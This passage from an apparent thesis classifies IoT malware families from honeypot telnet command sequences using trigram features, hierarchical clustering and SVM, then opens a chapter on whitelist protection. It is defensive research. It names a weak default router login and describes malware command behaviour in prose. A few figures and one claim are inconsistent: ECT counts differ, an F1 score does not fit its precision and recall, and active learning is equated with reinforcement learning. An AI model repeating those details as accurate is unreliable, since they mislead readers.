6. Jaro-Winkler: A string metric measuring an edit distance between two sequences with favorable ratings to strings that match from the beginning for a set prefix length. The Jaro-Winkler distance is a variation of Jaro distance. The Jaro distance dj of strings s1 and s2 is defined as:

$$d_j(s_1, s_2) = \frac{m}{3 \cdot l_1} + \frac{m}{3 \cdot l_2} + \frac{m - t}{3 \cdot m}$$

where l1 and l2 are the lengths (in characters) of s1 and s2, m is the number of matching characters, and t is half the number of transpositions. The Jaro-Winkler distance dw emphasizes prefix similarity between two strings. It is defined as [73]:

$$d_w(s_1, s_2) = d_j(s_1, s_2) + l \cdot p \cdot (1 - d_j(s_1, s_2)),$$

where l is the length of the longest common prefix of s1 and s2, and p is a constant scaling factor that also controls the emphasis placed on prefix similarity. The implementation we used considers prefixes up to 6 characters long, and sets p = 0.1.
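Three of the measures listed above (cosine on 3-shingles, trigram, and normalized Levenshtein) can be sketched in plain Python as follows. This is an illustrative reading of the formulas, not the library the study used; the function names are hypothetical, and returning a distance of 1.0 for strings too short to contain a shingle is an assumption.

```python
from collections import Counter
from math import sqrt

def shingles(s, k=3):
    """Multiset of all length-k substrings of s."""
    return Counter(s[i:i + k] for i in range(len(s) - k + 1))

def cosine_distance(s1, s2, k=3):
    """One minus the cosine of the k-shingle occurrence vectors."""
    v1, v2 = shingles(s1, k), shingles(s2, k)
    dot = sum(v1[g] * v2[g] for g in v1.keys() & v2.keys())
    norm = sqrt(sum(c * c for c in v1.values()) * sum(c * c for c in v2.values()))
    return 1.0 if norm == 0 else 1.0 - dot / norm

def trigram_distance(x, y):
    """One minus 2*|shared trigrams| / (|trigrams(x)| + |trigrams(y)|)."""
    tx, ty = shingles(x, 3), shingles(y, 3)
    shared = sum((tx & ty).values())  # multiset intersection
    total = sum(tx.values()) + sum(ty.values())
    return 1.0 if total == 0 else 1.0 - 2.0 * shared / total

def normalized_levenshtein(x, y):
    """Levenshtein distance divided by the length of the longer string."""
    if not x and not y:
        return 0.0
    prev = list(range(len(y) + 1))
    for i, cx in enumerate(x, 1):
        cur = [i]
        for j, cy in enumerate(y, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (cx != cy)))   # substitution
        prev = cur
    return prev[-1] / max(len(x), len(y))
```

All three functions return values in [0, 1], with 0 for identical strings, so they can be swapped freely when building the pairwise distance matrix between ECTs.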

We chose the top 500 command sequences in each of the four categories and then calculated the average and minimum distances between categories, with the results shown in Table 14 and Table 15. Specifically, we applied the six distance measurement methods, calculated the adjacency matrix between pairs of malware categories, and then calculated the average and minimum distance. The column under the “B-N” header indicates the distance between Bashlite and nttpd under each of the six measurements, the column under “M-Z” the distance between Mirai and ZORRO, and so on. We determined that cosine was the best distance for distinguishing ECTs, with trigram just slightly lower. However, we found a few command sequences in the same session containing both Bashlite and nttpd. The source code of Bashlite has been leaked, so other attackers can copy its functions and use them in their malware [15]. As a result, such malware executes command sequences carrying the signatures of multiple categories. Because cosine distance cannot distinguish the combined type of Bashlite command sequence, trigram provides a better solution for combined or mixed command sequences. Moreover, the source code for Mirai has similarly been leaked [74]. Based on the distance measure results, we chose trigram for use in this study.
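The inter-category comparison described above (all pairwise distances between the ECTs of two categories, then their average and minimum) can be sketched as follows. The helper names and the tiny example lists are hypothetical; the trigram distance is repeated here only to keep the sketch self-contained.

```python
from collections import Counter
from itertools import product

def trigram_distance(x, y):
    """One minus 2*|shared trigrams| / total trigrams (multiset based)."""
    tx = Counter(x[i:i + 3] for i in range(len(x) - 2))
    ty = Counter(y[i:i + 3] for i in range(len(y) - 2))
    total = sum(tx.values()) + sum(ty.values())
    return 1.0 if total == 0 else 1.0 - 2.0 * sum((tx & ty).values()) / total

def category_distance(ects_a, ects_b, distance=trigram_distance):
    """Average and minimum distance over all cross-category ECT pairs."""
    values = [distance(a, b) for a, b in product(ects_a, ects_b)]
    if not values:
        raise ValueError("both categories need at least one ECT")
    return sum(values) / len(values), min(values)

# Hypothetical ECTs for two categories.
average, minimum = category_distance(["ccccctsw"], ["ccccctsw", "BBEEq"])
```

A minimum of 0 between two categories signals that at least one ECT is shared verbatim, which is the situation the text describes for mixed Bashlite and nttpd sessions.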


Table 14 Distance measures for different malware labels (average).

| Distance/category | B-N | B-M | B-Z | N-M | N-Z | M-Z |
|---|---|---|---|---|---|---|
| Cosine | 0.9686 | 0.9492 | 0.9958 | 0.9990 | 1.0000 | 0.9516 |
| Trigram | 0.9086 | 0.9436 | 0.9230 | 0.9516 | 0.9661 | 0.9351 |
| NLCS | 0.7864 | 0.8888 | 0.8621 | 0.8895 | 0.9266 | 0.8642 |
| MLCS | 0.8367 | 0.9307 | 0.8971 | 0.9299 | 0.9472 | 0.9132 |
| NLD | 0.8795 | 0.9358 | 0.9118 | 0.9336 | 0.9585 | 0.9197 |
| Jaro-Winkler | 0.5238 | 0.6001 | 0.5615 | 0.5457 | 0.5851 | 0.4710 |

Table 15 Distance measures for different malware labels (minimum).

| Distance/category | B-N | B-M | B-Z | N-M | N-Z | M-Z |
|---|---|---|---|---|---|---|
| Cosine | 0.0163 | 0.7259 | 0.2929 | 0.5736 | 0.9678 | 0.1783 |
| Trigram | 0.4048 | 0.6968 | 0.1111 | 0.6667 | 0.6481 | 0.6197 |
| NLCS | 0.2500 | 0.5748 | 0.1429 | 0.4118 | 0.5556 | 0.3734 |
| MLCS | 0.3529 | 0.5893 | 0.1667 | 0.5455 | 0.6000 | 0.4048 |
| NLD | 0.3929 | 0.6857 | 0.1667 | 0.5455 | 0.6667 | 0.5318 |
| Jaro-Winkler | 0.2167 | 0.3217 | 0.0978 | 0.3119 | 0.2933 | 0.2251 |

Malware category feature extraction. N-gram is a model based on computational linguistics and probability [75], which can be used to estimate the likelihood of a sentence occurring at all or following a given word. N-gram can also provide efficient approximate string matching. Using N-gram to index lexicon terms, a signature file can be compressed to a smaller size. Moreover, N-gram can be used to calculate the similarity between two strings [76].

In this method, we used N-gram to collect ECT occurrence patterns. For each malware category, we collected the top 10 N-gram features, representing the major behavior in each category, and presented them as a histogram. These features were all based on a trigram model, namely, n = 3. We calculated the trigram histogram using four months of data for two categories. The command sequence distributions of Bashlite, Mirai, and Satori are shown in Fig. 15, 16, and 17, respectively. Based on the common command patterns of each malware category, we found that Bashlite tended to contain “cd,” “sh,” and “rm” behavior, Mirai often contained terms such as “busybox,” “cat,” and “echo,” and Satori tended to use terms such as “&&,” “cp,” and “busybox.” The results indicated that trigram could assist in revealing distinctive attack patterns among different IoT malware categories.
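Collecting the most frequent trigram features of one category, as described above, amounts to counting character trigrams over all of its ECTs. The following is a minimal sketch; the function name `top_trigrams` and the sample ECTs are hypothetical.

```python
from collections import Counter

def top_trigrams(ects, n=3, top=10):
    """Return the `top` most frequent character n-grams over a list of ECTs."""
    counts = Counter()
    for ect in ects:
        counts.update(ect[i:i + n] for i in range(len(ect) - n + 1))
    return counts.most_common(top)

# Hypothetical ECTs belonging to one malware category.
features = top_trigrams(["ccccctsw", "cctsw"])
```

The resulting (trigram, count) pairs are exactly what a per-category histogram would plot.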

Fig. 15 Trigram statistics of Bashlite IoT malware.


Fig. 16 Trigram statistics of Mirai IoT malware.

Fig. 17 Trigram statistics of Satori IoT malware.

To find the best n of n-gram similarity for analyzing our compressed data, we calculated the bigram, trigram, and 4-gram distances between Bashlite and Mirai ECTs. We conducted the calculation on both general and worst cases, choosing the longest 500 ECTs from Mirai and Bashlite as worst-case data. Table 16 and Table 17 show the distance and time cost of the different n-grams. For the top 500 ECTs, trigram takes only 21 seconds and yields a distance similar to that of 4-gram, whereas bigram takes 20 seconds and yields a shorter distance than trigram. For the longest 500 ECTs, bigram takes the least time and yields a distance about 0.01 shorter than trigram and 4-gram; trigram takes 73 seconds longer than bigram. Therefore, bigram is good enough for the worst case, and trigram is suitable for the top 500 ECTs. In this method, we chose trigram as our measurement for ECTs.

Table 16 Distance measures for different n-gram between Bashlite and Mirai

| Bashlite - Mirai | Bigram | Trigram | 4-gram |
|---|---|---|---|
| Top 500 ECTs | 0.937090 | 0.943678 | 0.944708 |
| Longest ECTs | 0.930650 | 0.940600 | 0.945393 |

Table 17 Time cost for different n-gram between Bashlite and Mirai

| Bashlite - Mirai | Bigram | Trigram | 4-gram |
|---|---|---|---|
| Top 500 ECTs | 20 sec | 21 sec | 24 sec |
| Longest ECTs | 466 sec | 539 sec | 569 sec |

5.2.3. Data analysis

The complete analytical process is illustrated in Fig. 18. First, command sequences were

extracted from pcap files, filtering for infection command sequences. Next, the command

sequence was encoded to create ECTs, and then the N-gram model was used to extract trigram

features from them. Finally, classification and clustering analysis was performed to determine

malware categories and new patterns.


Fig. 18 Data analysis flow

Clustering algorithms. Cyber attacks in IoT keep evolving, and the pattern of attacks is uncertain. Therefore, we chose the hierarchical clustering method because it does not require the number of clusters to be predefined. To identify new patterns, we chose a single-linkage hierarchical clustering algorithm, which is sensitive to outliers. The hierarchical clustering method works by successively combining individual data into clusters [77]. To our knowledge, the use of clustering algorithms on malware-related datasets was introduced by Bailey et al. [78], who also employed hierarchical clustering.
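Single-linkage clustering can be illustrated without any library: cutting a single-linkage dendrogram at a distance threshold yields the connected components of the graph that links every pair of items whose distance is at most that threshold. The sketch below uses this equivalence with a union-find structure. It is not the study's implementation (which relied on SciPy, where `scipy.cluster.hierarchy.linkage` with `method="single"` followed by `fcluster` would be the usual route); the threshold value and the sample ECTs are hypothetical.

```python
from collections import Counter

def trigram_distance(x, y):
    """One minus 2*|shared trigrams| / total trigrams (multiset based)."""
    tx = Counter(x[i:i + 3] for i in range(len(x) - 2))
    ty = Counter(y[i:i + 3] for i in range(len(y) - 2))
    total = sum(tx.values()) + sum(ty.values())
    return 1.0 if total == 0 else 1.0 - 2.0 * sum((tx & ty).values()) / total

def single_linkage_clusters(items, distance, threshold):
    """Flat clusters obtained by cutting a single-linkage tree at `threshold`."""
    parent = list(range(len(items)))

    def find(i):
        # Path-halving lookup of the cluster representative.
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    # Merge every pair that is close enough; chains of close pairs end up
    # in the same cluster, which is the defining property of single linkage.
    for i in range(len(items)):
        for j in range(i + 1, len(items)):
            if distance(items[i], items[j]) <= threshold:
                parent[find(i)] = find(j)

    clusters = {}
    for i, item in enumerate(items):
        clusters.setdefault(find(i), []).append(item)
    return sorted(clusters.values(), key=len, reverse=True)

# Hypothetical ECTs and cut threshold.
ects = ["ccccctsw", "cccctsw", "BBEEq", "BBEEEq"]
clusters = single_linkage_clusters(ects, trigram_distance, threshold=0.5)
```

The pairwise loop is quadratic in the number of ECTs, which is acceptable for a few thousand deduplicated ECTs but is one reason the encoding step that shrinks the dataset matters.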

Classification algorithms. We transformed the telnet logs into a smaller dataset of ECTs. However, trigram still generated hundreds of features. According to our trigram statistics, some Linux commands occur in a tightly fixed order; for example, malware tends to use "cd" to move to a writable folder and then conduct the download tasks via "wget" or "tftp" commands. In text categorization research, Joachims [79] has shown that SVM can handle a high-dimensional input space with few irrelevant features. In contrast, the Naive Bayes classifier assumes that the distributions of different terms are independent of each other. Even though the independence assumption is false in many real-world applications, Naive Bayes performs surprisingly well [80]. Therefore, we chose SVM as our classification algorithm and the Naive Bayes classifier as the baseline. By conducting the same experiments with these two algorithms, we could determine which was better for our research.

• Naive Bayes

Naive Bayes classifiers assume that an attribute value’s effect on a given class is independent of the values of other attributes; this is called “class-conditional independence” [81]. The Naive Bayes classifier greatly simplifies learning by assuming that features are independent given class. Although independence is generally a poor assumption, in practice Naive Bayes often competes well with more sophisticated classifiers [82].

• Support Vector Machines

SVM is a useful technique for data classification, whose aim is to produce a model that predicts the target values of the test data based solely on their attributes [79]. Given a training set of instance–label pairs (xi, yi), i = 1, …, l, where xi ∈ Rn and yi ∈ {1, −1}, SVM requires the solution of the following optimization problem:

$$\min_{w, b, \xi} \; \frac{1}{2} w^T w + C \sum_{i=1}^{l} \xi_i$$

$$\text{subject to } y_i (w^T \varphi(x_i) + b) \geq 1 - \xi_i, \quad \xi_i \geq 0, \quad i = 1, \dots, l,$$

where C > 0 is the penalty parameter of the error term and K(xi, xj) ≡ φ(xi)Tφ(xj) is called the kernel function. Many kinds of kernel functions are available, such as linear, polynomial, and sigmoid. For our dataset, we chose a linear kernel function according to our ECT numbers [78][79].
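The Naive Bayes baseline on trigram features can be sketched in plain Python as a multinomial model with add-one smoothing. This is an illustrative sketch, not the study's code: the class name `TrigramNaiveBayes`, the smoothing choice, the decision to ignore trigrams never seen in training, and the toy training data are all assumptions.

```python
from collections import Counter, defaultdict
from math import log

def trigrams(ect):
    """List of character trigrams of an ECT."""
    return [ect[i:i + 3] for i in range(len(ect) - 2)]

class TrigramNaiveBayes:
    """Multinomial Naive Bayes over trigram counts with add-one smoothing."""

    def fit(self, ects, labels):
        self.class_counts = Counter(labels)
        self.feature_counts = defaultdict(Counter)
        self.vocab = set()
        for ect, label in zip(ects, labels):
            grams = trigrams(ect)
            self.feature_counts[label].update(grams)
            self.vocab.update(grams)
        return self

    def predict(self, ect):
        total = sum(self.class_counts.values())
        # Trigrams never seen during training are ignored (assumption).
        grams = [g for g in trigrams(ect) if g in self.vocab]
        best_label, best_score = None, float("-inf")
        for label, n in self.class_counts.items():
            counts = self.feature_counts[label]
            denom = sum(counts.values()) + len(self.vocab)
            # Log prior plus the sum of log likelihoods of each trigram.
            score = log(n / total) + sum(log((counts[g] + 1) / denom) for g in grams)
            if score > best_score:
                best_label, best_score = label, score
        return best_label

# Hypothetical training data: two ECTs per category.
model = TrigramNaiveBayes().fit(
    ["ccccctsw", "cccctsw", "BBEEq", "BBEEEq"],
    ["Bashlite", "Bashlite", "Mirai", "Mirai"],
)
prediction = model.predict("ccctsw")
```

Summing log likelihoods per trigram is where the independence assumption enters: each trigram contributes on its own, even though neighboring trigrams of an ECT overlap in two characters.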

Classification evaluation. We used a confusion matrix and accuracy to measure the classification result. Given a target category, let TP (true positive) be the number of ECTs correctly classified as the target category, FN (false negative) the number of sequences from the target category misclassified as another, TN (true negative) the number of sequences from other categories that are correctly classified, and FP (false positive) the number of sequences incorrectly classified as the target category. The precision (P) is defined as precision = TP / (TP + FP), and the recall rate (R) is defined as recall = TP / (TP + FN). The F-score represents the harmonic mean of P and R and provides a balance between them: F-score = 2PR / (P + R). The F-score assists in identifying a threshold of similarity. Accuracy (A) is defined as accuracy = (TP + TN) / (TP + FP + FN + TN), and the error rate is defined as error rate = (FP + FN) / (TP + FP + FN + TN) [77].
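The evaluation measures defined above translate directly into code. The following sketch uses hypothetical function names and made-up counts; returning 0.0 when a denominator is zero is an assumption, not something the text specifies.

```python
def f_score(precision, recall):
    """Harmonic mean of precision and recall (0.0 if both are zero)."""
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)

def classification_metrics(tp, fp, fn, tn):
    """Precision, recall, F-score, accuracy, and error rate for one category."""
    total = tp + fp + fn + tn
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return {
        "precision": precision,
        "recall": recall,
        "f_score": f_score(precision, recall),
        "accuracy": (tp + tn) / total if total else 0.0,
        "error_rate": (fp + fn) / total if total else 0.0,
    }

# Made-up confusion counts for one target category.
metrics = classification_metrics(tp=8, fp=2, fn=2, tn=88)
```

As a consistency check against the reported results, a precision of 0.87 and a recall of 0.89 give an F-score of about 0.88, matching the Bashlite row of Table 22.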

5.3. Experiments

5.3.1. Dataset and Environment

Data collection for classification was undertaken from December 2016 to September 2017. The

dataset contained data for 284 days from physical IoT devices in the IoTPOT. As illustrated in

Table 18, the dataset included 2.7 million infection command sequences related to malware that

we downloaded to another server in real time. These sequences could be reduced to 44,843 unique

command sequences through correlation and deduplication. Moreover, our encoding method was

able to reduce the command sequences to 2,925 ECTs. To discover hidden patterns, we chose the

data for a one-month period as dataset 2 for the clustering experiment.

Table 18 Dataset for analysis.

| Dataset | Number of infection command sequences | Rearranged command sequences | Number of unique ECTs | Time interval | Analysis |
|---|---|---|---|---|---|
| 1 | 2,756,231 | 44,843* | 2,925 | 2016/12/07~2017/09/16 | NB, SVM |
| 2 | 422,591 | 95,448** | 4,626 | 2017/04/01~2017/04/30 | Hierarchical clustering |

* Correlating malware binaries, extracting command sequences that download binaries, and conducting data deduplication

** Extracting command sequences and conducting data deduplication

DrWeb was used to scan the malware binaries, after which malware labels and corresponding

ECTs could be obtained. The distribution of labels is shown in Table 19, indicating that the

majority of malware in the IoTPOT came from Bashlite and Mirai.

Table 19 Malware categories and ECTs' distribution.

| Label | Bashlite | Mirai | Hajime | Tsunami |
|---|---|---|---|---|
| Numbers of ECTs | 665 | 3408 | 155 | 58 |
| Numbers of malware | 2755 | 2665 | 34 | 162 |

From Dec. 7th, 2016 to Sept. 16th, 2017, our honeypot collected 1.36 terabytes (TB) of pcap files. We extracted 22.9 gigabytes (GB) of telnet logs using a server with a ten-core Intel 2.20 GHz CPU, 62 GB RAM, and a 4 TB disk. This task is scheduled to run automatically every day; processing the full 1.36 TB of pcap files takes about eight days. The other time costs of our method are shown in Table 20. Data preprocessing begins with filtering infection commands from the telnet logs. To filter out and label the malware-related telnet logs in dataset 1, we utilized Google BigQuery [83] to process the 22.9 GB of telnet logs. ECT transformation and the machine learning algorithms were run on a machine with two quad-core Intel 3.70 GHz CPUs, 16 GB RAM, and a 1 TB disk. SciPy 0.18.1 [84] was used to support the clustering and classification algorithms.

Table 20 Statistics of time cost.

| Algorithm | Set | Data preprocessing | Feature extraction | Clustering/Classification | Total |
|---|---|---|---|---|---|
| SVM | 1 | 174 mins 1 secs | 21 secs | 20 secs | 174 mins 42 secs |
| Naïve Bayes | 1 | 174 mins 1 secs | 21 secs | 15 secs | 174 mins 37 secs |
| Hierarchical Clustering | 2 | 13 secs | 73 mins 21 secs | 1 mins 5 secs | 74 mins 39 secs |

5.3.2. Clustering Experiments

The hierarchical clustering method involves successively combining individual data into

clusters. We conducted a hierarchical clustering analysis using dataset 2. As shown in Fig. 19, the

algorithm separated 4,636 ECTs into 30 clusters according to the trigram distance. We labeled the

clusters according to antivirus engine scan results of malware binaries or with reference to

malware analysis reports from cybersecurity researchers. Detailed text features of malware families are summarized in Appendix A.

Our method successfully differentiated three known malware families and their variants and also discovered one new cyber attack pattern in IoT, called “Fileless DoS.” Although the four best-known malware families are Mirai, Bashlite, Hajime, and Tsunami, Tsunami employs Linux commands in a similar manner to Bashlite and was therefore assigned to the leaf cluster named “(10).” The MD5 hashes of the Tsunami samples that share an infection pattern similar to that of Bashlite are shown in Appendix B.


X-axis: ECT index number # or cluster size (*)

The clustering results helped to discover the following malware variants and new cyber attack pattern:

• Mirai/A and Bashlite/A are malware variants that truncate ptmx files after login. The ptmx file is used to create a pseudoterminal master–slave pair [85]. Both Mirai/A and Bashlite/A contain this command, and the maximum distance to separate them must be less than 0.58.

• Mirai/B targets devices with weak default credentials, where the login ID is root or Admin and the password is 5up, such as the TP-Link TL-WR740N [86]. The Mirai/B commands are more straightforward than those of the original Mirai. For example, Mirai/B does not check device partitions with commands such as cat /proc/mounts [66].

• Fileless DoS is a shell script that employs an infinite while loop and multiple wget commands to mount a DoS attack. Downloaded web contents are sent to /dev/null, and thus no binaries are stored in devices. A total of 934 Fileless DoS ECTs were discovered in April 2017. The top ten victim websites are shown in Table 21, including those of a music band, a construction company, and an IT solutions company.
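On the defensive side, the three traits of the Fileless DoS pattern listed above (an infinite while loop, wget commands, and output discarded to /dev/null) suggest a simple screening heuristic for captured command sequences. The sketch below is a hypothetical filter written for illustration; it is not the detection logic of the study, which found the pattern through clustering, and the regular expressions are assumptions about how the loop appears in logs.

```python
import re

# Assumed textual forms of the traits described in the text.
WHILE_TRUE = re.compile(r"\bwhile\s+true\b")
WGET = re.compile(r"\bwget\b")

def looks_like_fileless_dos(command_sequence):
    """Flag sequences that loop forever over wget and discard the output."""
    return (
        WHILE_TRUE.search(command_sequence) is not None
        and WGET.search(command_sequence) is not None
        and "/dev/null" in command_sequence
    )
```

A filter of this kind could pre-select candidate sessions for manual review; sequences that download and then execute a file do not match because they keep the downloaded content.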

Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017


Table 21 Victims of Fileless DoS.

Victim websites Counts

http://fxxxxxxxx.com:80 7111

http://xxx.xxx.80.118:80 5669

http://www.txxxxxxxxxxxx.com:80 2722

http://www.hxxxxxxxx.co.il:80 2564

http://www.bxxxxxxxxxxxxxxxxxxxxx.com:80 2354

http://www.kxxxxxxxxxxxxxxxxxxxxxxxxx.de:80 1982

http://txxxxxxxxxxx.com:80 1980

http://www.axxxxx.dk:80 1878

http://xxx.xxx.19.69:80 1843

http://cxxxxxxxxxxxxxxxxxx.com:80 1749

5.3.3. Classification Experiments

Because the data amounts varied greatly among categories, we designed two experiments to identify whether data bias affected classification accuracy. Two datasets were prepared for our experiments. The first contained 1000 ECT types per malware category; Bashlite, Hajime, and Tsunami data were repeated up to 1000. The second dataset contained all ECT types from every category. Our program randomly chose 50% of the data as a training set and then tested on the remaining 50%. To avoid selecting only Mirai data, we chose the training dataset for the second experiment at random. The precision and recall scores are listed in Table 22, Table 23, Table 24, and Table 25.
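The even-sampling preparation and the 50/50 split described above can be sketched as follows. The helper names are hypothetical; repeating a category's ECTs in their original order and truncating larger categories to the first 1000 entries are assumptions, since the text only states that smaller categories were repeated up to 1000.

```python
import random
from itertools import cycle, islice

def oversample(items, size):
    """Repeat items cyclically until exactly `size` entries are reached.

    Categories larger than `size` are truncated (assumption).
    """
    return list(islice(cycle(items), size))

def split_half(samples, seed=0):
    """Shuffle and split samples into equal-sized training and test halves."""
    rng = random.Random(seed)
    shuffled = list(samples)
    rng.shuffle(shuffled)
    half = len(shuffled) // 2
    return shuffled[:half], shuffled[half:]

# Hypothetical small category expanded to seven entries, then split.
balanced = oversample(["a", "b", "c"], 7)
train, test = split_half(range(10), seed=1)
```

One caveat of oversampling by repetition before splitting is that copies of the same ECT can land in both halves, which should be kept in mind when reading the even-sampling results.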

Table 22 Classification performance of even sampling- Naive Bayes.

label precision recall f1-score support

Bashlite 0.87 0.89 0.88 513

Mirai 0.83 0.77 0.80 499

Hajime 1.00 1.0 1.00 476


Tsunami 0.70 0.74 0.72 512

avg / total 0.85 0.85 0.85 2000

Table 23 Classification performance of even sampling- SVM.

label precision recall f1-score support

Bashlite 1.0 0.87 0.93 513

Mirai 0.85 0.75 0.80 499

Hajime 1.0 1.0 1.0 476

Tsunami 0.70 0.87 0.78 512

avg / total 0.89 0.87 0.87 2000

Table 24 Classification performance of random sampling- Naive Bayes.

label precision recall f1-score support

Bashlite 0.88 0.93 0.91 155

Mirai 0.98 0.99 0.99 1225

Hajime 0.94 1.0 0.97 60

Tsunami 0.00 0.00 0.00 24

avg / total 0.95 0.97 0.96 1464

Table 25 Classification performance of random sampling- SVM.

label precision recall f1-score support

Bashlite 0.92 0.94 0.95 155

Mirai 0.98 1.0 0.99 1225

Hajime 1.0 1.0 1.0 60

Tsunami 0.00 0.00 0.00 24

avg / total 0.96 0.98 0.97 1464

Based on the results of these experiments, SVM performed better than Naive Bayes. However, Tsunami was easily misclassified as Bashlite. We believe that second-stage training is necessary for real cases. Such reinforcement learning, also called active learning, involves fine-tuning the model during the training process. Therefore, based on the prediction results for Bashlite and Tsunami, we further developed a sub-training approach by adding an additional feature (file size) and performing sub-classifier training. As shown in Table 26, the precision of Tsunami classification improved because its file sample metadata differed from that of Bashlite. Using additional features can thus help to prevent misidentifying classes that share the same command line pattern, simply by looking at the command line and file meta-information and without requiring static or dynamic analysis. Mirai’s open source code provides hackers with an entry point for developing new variants. It has been noted that hackers rely on known or zero-day vulnerabilities for developing new Mirai variants to attack IoT devices [87]. Hence, this evolution may give rise to new patterns of ECTs.
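The idea of a second stage that revisits only the confusable classes can be illustrated with a deliberately simple sketch. It is not the sub-classifier used in the study, whose details are not given: here the second stage looks at file size alone and assigns the class whose mean training file size is closest, and all names and file sizes are hypothetical.

```python
from statistics import mean

# Classes the first stage tends to confuse, as reported in the text.
AMBIGUOUS = {"Bashlite", "Tsunami"}

def fit_size_centroids(samples):
    """Mean file size per ambiguous class from (label, size_in_bytes) pairs."""
    sizes = {}
    for label, size in samples:
        if label in AMBIGUOUS:
            sizes.setdefault(label, []).append(size)
    return {label: mean(values) for label, values in sizes.items()}

def second_stage(first_stage_label, file_size, centroids):
    """Re-decide only ambiguous predictions using the nearest size centroid."""
    if first_stage_label not in AMBIGUOUS or not centroids:
        return first_stage_label
    return min(centroids, key=lambda label: abs(centroids[label] - file_size))

# Made-up training file sizes in bytes.
centroids = fit_size_centroids([
    ("Bashlite", 100_000), ("Bashlite", 120_000),
    ("Tsunami", 40_000), ("Mirai", 60_000),
])
refined = second_stage("Bashlite", 45_000, centroids)
```

Predictions outside the ambiguous pair pass through unchanged, so the second stage cannot degrade the classes that the first stage already separates well.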

Table 26 Precision/recall of SVM – second stage (reinforcement learning).

label precision recall f1-score support

Bashlite 0.99 0.99 0.99 155

Mirai 0.98 1.00 0.99 1225

Hajime 1.0 1.0 1.00 60

Tsunami 0.90 0.86 0.88 24

Avg / total 0.96 0.98 0.97 1464

5.4. Discussion

For IoT malware that attacks via the telnet protocol, our clustering experiments show that our method can find a new cyber attack, "Fileless DoS," and changes introduced by malware variants. Moreover, our trigram features can help in the classification of IoT malware. Comparisons with previous studies are as follows:

• The method proposed by Ham et al. [25] relies on features about the network, phone, message, CPU, battery, and memory for each process in Android devices. However, it is hard to extend IoT devices and install third-party packages on them. Our method analyzes only the telnet traffic between the attacker and victim devices and requires no modification of IoT devices.

• Azmoodeh, Dehghantanha, and Choo [26] analyzed the OpCode sequence and applied a deep Eigenspace learning approach to classify malicious and benign applications. Their method achieves an excellent 99.68% accuracy. The OpCode sequence is generated from malware binaries, but IoT malware such as Mirai and Bashlite may remove its binaries after execution. Moreover, many IoT devices utilize flash storage, and rebooting will erase the malware binaries. In contrast, our method does not need to convert binaries to OpCode and graphs; it can infer the malware family from telnet traffic and demonstrates 96.70% accuracy.

• Su et al. [27] investigated a lightweight method of detecting DDoS malware in IoT environments. They converted binaries to grayscale images and then classified IoT malware families with a convolutional neural network. The system achieved 94.0% accuracy in goodware and DDoS malware classification and 81.8% accuracy in classification of goodware and the two main malware families. Su's method examines only the Mirai and Bashlite families. Our method examines four malware families and achieves 96.70% accuracy.

In this method, we utilize physical IoT devices as honeypots to obtain the dataset. These devices are known to have been targeted by IoT malware, and in that sense we believe that the dataset can provide a partial view of real cyber attacks against IoT devices in the wild. We cannot claim that the dataset represents all attacks in IoT, as we have only a limited number of devices for the honeypot. However, we believe the study is meaningful, as the honeypot was indeed able to observe and capture samples from four major IoT malware families targeting IoT telnet services, and the proposed method was able to discover an evolving attack such as Fileless DoS.

The limitations of our method may come from the attack vector of IoT malware:

(1) Our method does not analyze HTTP or SSH protocol.


(2) Our method might be affected if hackers intentionally add parts of other malware codes to

their malware.


Chapter 6.

IoTProtect: Highly Deployable Whitelist-based Protection for

Low-cost Internet-of-Things Devices

6.1. Introduction

The Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and

buildings, embedded with electronics, sensors, and network connectivity. Connectivity enables

these objects to collect and exchange data for further applications and business use. However, a

threat from IoT malware has materialized. In Oct. 2016, IoT malware called Mirai, reported to have infected over 100,000 IoT devices such as Internet Protocol (IP) cameras, conducted the largest ever distributed denial-of-service (DDoS) attack against Dyn DNS [2]. We

have been using IoTPOT [4], a honeypot that monitors attacks on IoT devices, to observe cyber

attacks against such devices and analyze the threats from IoT malware. As shown in Fig. 20, the

number of attacking hosts, many of which are indeed IoT devices compromised and misused by

attackers, has increased rapidly since Aug. 2016.

Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March 2017


Our observations show that most of the compromised devices are home routers [88] and IP

cameras [89]. Although many security vendors have developed commercial anti-virus software

for embedded systems, such as those listed in Table 27, these are not suitable for protecting the

above-mentioned low-cost devices as a result of resource constraints and unsupported platforms.

Moreover, all of the commercial products require substantial modification of the firmware that

would incur high engineering costs, especially if the manufacturer wants to deploy the security

product on existing products.

Table 27 Commercial secure software against embedded systems.

| Product name | Supported platform | Min. Resource Constraint | Other Constraint |
|---|---|---|---|
| McAfee Embedded Control 6.x [90] | RHEL 4/5/6/7; CentOS 5/6/7; SuSE 10/11; Open SuSE 10/11; Solaris 9/10; WEPOS, POSReady 2009; Windows Embedded Systems (WES) 2009; Windows XP/Vista/7/8; Windows NT/2000/2003/2008 | 512 MB RAM; 80 MB free disk space | Rebuild kernel module [94] |
| Kaspersky Embedded Systems Security 2.0 [91] | Windows XP/7/8/10; WEPOS 2009/7; WES XP/7/8; Windows 10 Redstone; Windows 10 IoT Ent | 256 MB RAM; 50 MB free disk space | N/A |
| Trend Micro OfficeScan 10.6 [92] | WEPOS 2009/7; WES XP/Vista/7 | 256 MB RAM; 350 MB free disk space | N/A |
| Symantec Critical System Protection 5.2 (Agent) [93] | RHEL 5/6; CentOS 5/6; SUSE 8/9/10/11; Solaris 10/11; Oracle 5/6; QNX; IBM AIX 5L; HP Unix 11; WEPOS, 2009/7; WES XP/7; Windows XP/Vista/7/8; Windows 2003/2008/2012 | 256 MB RAM; 100 MB free disk space | Additional management server [95] |

In addition to the commercial security software, many studies deal with the protection of low-cost IoT devices [35]. Because they also require firmware modifications, their deployment costs are similar to those of the commercial options.

6.2. Preliminaries

6.2.1. Linux process information

